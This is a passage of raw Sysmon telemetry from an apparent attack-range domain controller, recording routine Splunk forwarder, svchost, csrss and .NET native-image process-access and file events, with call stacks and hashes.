Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:53.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:53.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A141-60D3-C102-00000000CF01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:53.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A141-60D3-C102-00000000CF01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.709{4DB9351A-A141-60D3-C102-00000000CF01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.113{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8071EE411A2CAC55FE9B0B88F306CC08,SHA256=5C7B991FBAC822ED572D2F141D41EDFA380262216A4DFDEBE4E909784E50C339,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A141-60D3-C002-00000000CF01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:53.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A141-60D3-C002-00000000CF01}6648C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.082{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A141-60D3-C002-00000000CF01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.083{4DB9351A-A141-60D3-C002-00000000CF01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019303Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.164{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE4B8575D3CDD42CC4E107110619AED,SHA256=1AA0B7FF8092A886156F8B5840F18150B2C113B559D80E6184685B4852351BE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019302Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.148{4DB9351A-A142-60D3-C402-00000000CF01}1336NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9NU9HWLHX7\System.Windows.Forms.DataVisualization.Design.ni.dll.auxMD5=78599A1B8493785F093F32E9AF9022A3,SHA256=A315CF772511B15DB7963986271B11BA254B1B12502368C8E195499848E3CB04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019301Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.148{4DB9351A-A142-60D3-C402-00000000CF01}1336NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9NU9HWLHX7\System.Windows.Forms.DataVisualization.Design.ni.dllMD5=43145A886A97B7C87D0CF1A9BBDDA8C5,SHA256=3B2B448EBCB27CE4D9A9C0317D6EFD50D57D635AD7B3ED46BED5BC9793699474,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019300Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:55.133{4DB9351A-A142-60D3-C402-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\538-0\System.Windows.Forms.DataVisualization.Design.dll2021-06-23 21:01:55.133 23542300x800000000000000019339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:56.820{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=712641F927CB215E9EEC32D730317D37,SHA256=E3729AC9CBFA47C35C6943A7FEC248D1ECE3E4894524D3C6BB64CEBAEC05D6F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.430{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB0C44A1C02C2CD3AFC26C92E8CDEC2,SHA256=0FFE5D08DB4E543338DE8A4B9C50E91D2810C67C7AE8E88A6BB4533AADABC325,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.180{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A144-60D3-CB02-00000000CF01}5936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:56.164{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A144-60D3-CB02-00000000CF01}5936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.164{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A144-60D3-CB02-00000000CF01}5936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.055{4DB9351A-A143-60D3-CA02-00000000CF01}55882312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.476{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F157012F3E7472F5E01963294173BEF1,SHA256=32E013A63D0C64D618889404EFC79FF10E787E9CF58C5C07CF7189FDAEC51B59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.351{4DB9351A-A145-60D3-CC02-00000000CF01}42045680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A145-60D3-CC02-00000000CF01}4204C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:57.055{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A145-60D3-CC02-00000000CF01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
